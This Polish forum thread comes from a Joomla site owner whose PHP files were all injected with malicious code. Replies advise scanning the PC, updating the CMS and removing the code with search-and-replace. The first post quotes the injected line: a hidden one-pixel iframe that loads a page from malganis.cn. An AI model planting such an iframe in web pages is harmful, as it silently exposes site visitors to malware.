Złośliwy kod w każdym pliku
Wyniki 1 do 8 z 8

Temat: Złośliwy kod w każdym pliku

  1. #1
    Nowicjusz
    Dołączył
    03-08-2007
    Wpisy
    13
    Punkty
    10

    Domyślny Złośliwy kod w każdym pliku

    Sprawa wygląda następująco:
    jest to już kolejny atak na moją stronę, wszystko wygląda jakby to robił jakiś cholerny automat.

    W każdym pliku php (a jak sami wiemy w joomli jest tego multum) mam taki oto kod

    <iframe src="http://malganis.cn/in.cgi?2" width="1" height="1" style="display:none;"></iframe>

    kiedyś był inny, ale teraz to i tak nie ma to znaczenia. Czy znacie jakiś sposób aby pozbyć się tego wszystkiego (błagam, tylko nie piszcie, że ręcznie) oraz jak się ustrzec takich sytuacji na przyszłość. Dostawca hostingu to ovh, zmiany haseł, całkowite czyszczenie kont ftp( przez dostawce) nie pomogły, i jest to już kolejny atak.
    Z góry dzięki za info jak rozwiązać problem.

    adres do mojej strony flyrc.ovh.org

  2. Pani Reklamowa
    Pani Reklamowa jest aktywna
    Avatar Panny Google

    Dołączył
    19-08-2010
    Skąd
    Internet
    Postów
    milion
    Pochwał
    setki
  3. #2
    Wiarus
    Dołączył
    08-01-2007
    Wpisy
    1 228
    Punkty
    70

    Domyślny

    teraz masz blad na stronie...
    dostawca ovh, chociaz darmowy..ale jak na darmowego ok...

    problem tkwi prawdopodobnie w twoim kompie lokalnym...:
    przeskanuj go i usun trojana, o ktorym jest glosno, zrezygnuj z tc, nie zapisuj hasel w pamieci ftp-a...
    a reszte ...dobrze dzialasz....

  4. #3
    Nowicjusz
    Dołączył
    03-08-2007
    Wpisy
    13
    Punkty
    10

    Domyślny

    Komputer skanuje co kilka dni i jest czysty (bitDefender 2k10) korzystam z pajączka (TC już dawno poszedł w odstawkę)

    błąd na stronie jest to odnośnik właśnie do tego kodu....

  5. #4
    Wyga trzepiz awatar
    Dołączył
    06-01-2006
    Skąd
    SH | SC
    Wpisy
    3 528
    Punkty
    252

    Domyślny

    no to zaczynaj ręcznie usuwać albo skorzystaj z dobrodziejstw systemów *NIX-owych gdzie możesz sobie napisać skrypt który wykasuje ci zawartość <iframe> ze wszystkich plików. Metoda jest dobra pod warunkiem, że nie używasz nigdzie <iframe> dla swoich celów.

    przede wszystkim, po ukończeniu usuwania kodu przeprowadź aktualizację wszystkich modułów komponentów no i oczywiście samego CMS Joomla! jeśli nie masz jeszcze najnowszej wersji.

  6. #5
    Nowicjusz
    Dołączył
    03-08-2007
    Wpisy
    13
    Punkty
    10

    Domyślny

    Masz może gdzieś gotowy skrypt wymagający co najwyżej niewielkich przeróbek, bo jeśli o to chodzi to jestem totalna noga?

  7. #6
    Wyga trzepiz awatar
    Dołączył
    06-01-2006
    Skąd
    SH | SC
    Wpisy
    3 528
    Punkty
    252

    Domyślny

    skoroś noga .. to jak chcesz wykorzystać skrypt o działaniu którego nie masz pojęcia na systemie którego nie posiadasz ? ..

    ręcznie kolego

    poza tym, nigdy nie sprawdzałem owego rozwiązania, więc ciężko mi mówić o jego pewności i skuteczności. Wiem tylko, że bez problemu można wyciąć ciągi znaków wykorzystując do tego konsolę np: w Linuxie

  8. #7
    Wiarus
    Dołączył
    08-01-2007
    Wpisy
    1 228
    Punkty
    70

    Domyślny

    poszukaj programu pspad editor lub textexchange..jest tam opcja wyszukiwania i edytowania wpisow...

  9. #8
    Nowicjusz
    Dołączył
    03-08-2007
    Wpisy
    13
    Punkty
    10

    Domyślny

    Cytat Wysłane przez big_krzysiek Zobacz wiadomość
    poszukaj programu pspad editor lub textexchange..jest tam opcja wyszukiwania i edytowania wpisow...
    Sciągnąłem tego pspad i wszystko git dzięki wielkie

Reguły pisania

  • Nie możesz zakładać nowych tematów
  • Nie możesz dodawać wypowiedzi
  • Nie możesz dodawać załączników
  • Nie możesz poprawiać swoich postów
  •